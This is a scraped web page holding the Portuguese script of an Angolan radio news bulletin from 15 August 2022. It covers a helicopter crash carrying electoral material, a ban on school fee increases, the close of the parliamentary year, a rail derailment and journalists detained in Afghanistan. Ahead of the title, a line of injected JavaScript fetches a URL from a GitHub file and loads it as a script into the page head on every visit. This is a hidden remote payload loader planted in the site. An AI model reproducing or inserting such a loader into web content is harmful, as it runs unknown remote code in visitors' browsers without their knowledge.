;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal das 7h, edição de 15 de Agosto de 2022 | RadioPlayDigital
Jornal das 7h, edição de 15 de Agosto de 2022

 

 

HELICÓPTERO COM MATERIAL DA CNE CAI NO ALTO ZAMBEZE

 

GOVERNO PROÍBE SUBIDA DE PROPINAS NAS ESCOLAS NO ANO LECTIVO 2022/2023 – SINPROF APROVA A MEDIDA

 

ASSEMBLEIA NACIONAL ENCERRA HOJE QUINTO ANO PARLAMENTAR

 

INTERNACIONAL

 

MAIS DE 80 JORNALISTAS DETIDOS E TORTURADOS NUM ANO DE REGIME TALIBÃ

 

Jornal Síntese da MFM, segunda-feira 15 de Agosto de 2022, Coordenação de Alves Fernandes, Suporte técnico de Edson Machado e Edmundo Simões, edição e microfone de Tony Fancy.

 

JINGLE

 

Um helicóptero da Força Aérea Nacional, com material da Comissão Nacional Eleitoral, despenhou-se este domingo, na comuna do Lóvua, município do Alto Zambeze, província do Moxico, sem causar vítimas.

 

O presidente da Comissão Municipal Eleitoral, José Augusto, revelou à ANGOP que o aparelho transportava material eleitoral para a comuna do Lóvua, que dista 79 quilómetros do Cazombo, capital do município do Alto Zambeze,

Segundo José Augusto, um problema técnico terá estado na origem do incidente com o aparelho, que transportava também 15 pessoas, entre os quais cinco tripulantes.

O município do Alto Zambeze, que dista 519 quilómetros do Luena, capital da província, tem mais de 56 mil eleitores distribuídos em seis comunas.

 

PONTO

 

As instituições públicas e privadas de ensino em todo o país estão proibidas de aumentar os preços das propinas e emolumentos no ano lectivo 2022/2023.

Um comunicado do Instituto de Gestão de Activos e Participação do Estado (IGAPE, divulgado na última semana, esclarece que o único cenário que pode se registar é a redução do valor das propinas.

Segundo o comunicado, quem violar este instrutivo arrisca-se a uma penalização criminal e civil.

O Secretario Geral do Sindicato Nacional de Professores, Ademar Jinguma considerou positiva e medida e deixou alguns recados ao governo.

 

ADEMAR JINGUMA – J013H13082022

 

 

Instituições públicas e privadas de ensino em todo o país estão proibidas de aumentar os preços das propinas e emolumentos no ano lectivo 2022/2023.

 

PONTO CORRIDO

 

A Assembleia Nacional realiza, esta segunda-feira, a sessão solene de encerramento do quinto e último Ano Parlamentar da Quarta Legislatura.

O encerramento do ano parlamentar será marcado pelo discurso do presidente da Assembleia Nacional, Fernando da Piedade Dias dos Santos, e a apresentação do relatório das actividades realizadas durante a legislatura.

O último ano parlamentar da Quarta Legislatura foi marcado pela conclusão do pacote legislativo eleitoral, que sustenta a realização das Eleições Gerais de 24 de Agosto.

-.-

A circulação de comboios do Caminho de Ferro de Moçâmedes (CFM), entre o Namibe e o Lubango (Huíla), está suspensa por tempo indeterminado, em consequência de danos causados na linha, pelo descarrilamento de uma composição de vagões vazios.

A empresa do CFM esclareceu, este sábado, que a circulação retoma apenas quando terminarem os trabalhos técnicos para a reposição da linha destruída pelo descarrilamento, ocorrido, na última sexta-feira, na estação da Bibala, província do Namibe.

 

 

A nota refere que o incidente se deu, por volta das 14h25, quando 26 dos 34 vagões vazios da composição recuaram na posição sentido Moçâmedes e descarrilaram naquela zona do município da Bibala.

A empresa ferroviária de Moçâmedes esclarece, ainda, que o incidente provocou a danificação de cerca de 200 metros de linha férrea.

 

INTERNACIONAL

 

Mais de 80 jornalistas foram presos e torturados no Afeganistão no espaço de um ano, desde que os talibãs regressaram ao poder, por relatarem protestos pacíficos, revela a Amnistia Internacional num relatório publicado hoje.

Só em maio e junho, o Comité para a Proteção dos Jornalistas registou 11 detenções no Afeganistão, refere a organização de defesa dos direitos humanos, que denuncia “impunidade generalizada” para crimes como tortura e assassinatos por vingança.

 

 

 

 

 

 

 

 

Data de Emissão: 15-08-2022 às 07:00
Género(s): Noticiário
 
PARTICIPANTES

Relacionados